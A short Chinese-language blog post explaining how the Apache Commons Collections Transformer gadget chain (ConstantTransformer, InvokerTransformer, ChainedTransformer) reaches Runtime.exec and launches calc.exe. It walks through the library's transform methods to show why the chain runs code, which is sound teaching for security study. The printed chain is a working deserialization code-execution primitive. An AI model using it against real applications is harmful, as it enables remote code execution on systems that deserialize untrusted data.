java反序列化 - Transformer类可以执行恶意代码的原理

0x00 代码

Transformer[] transformers = new Transformer[]{                  new ConstantTransformer(Runtime.class),                  new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]}),                  new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class},new Object[]{null, new Object[0]}),                  new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe",}),          };          Transformer transformerChain = new ChainedTransformer(transformers);          ByteArrayOutputStream out = new ByteArrayOutputStream();          ObjectOutputStream objOut;        try {            objOut = new ObjectOutputStream(out);            objOut.writeObject(transformerChain);            transformerChain.transform(null);        } catch (IOException e) {            // TODO Auto-generated catch block            e.printStackTrace();        }

执行结果：

0x01 Transformer类为什么可以执行恶意代码？

transformerChain.transform(null); 执行的是：ChainedTransformer类的transform方法

public Object transform(Object object) {        for (int i = 0; i < iTransformers.length; i++) {            object = iTransformers[i].transform(object);        }        return object;    }

object = iTransformers[i].transform(object); 执行的是InvokerTransformer类的transform方法

public Object transform(Object input) {        if (input == null) {            return null;        }        try {            Class cls = input.getClass();            Method method = cls.getMethod(iMethodName, iParamTypes);            return method.invoke(input, iArgs);        } catch (NoSuchMethodException ex) {            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");        } catch (IllegalAccessException ex) {            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");        } catch (InvocationTargetException ex) {            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);        }    ｝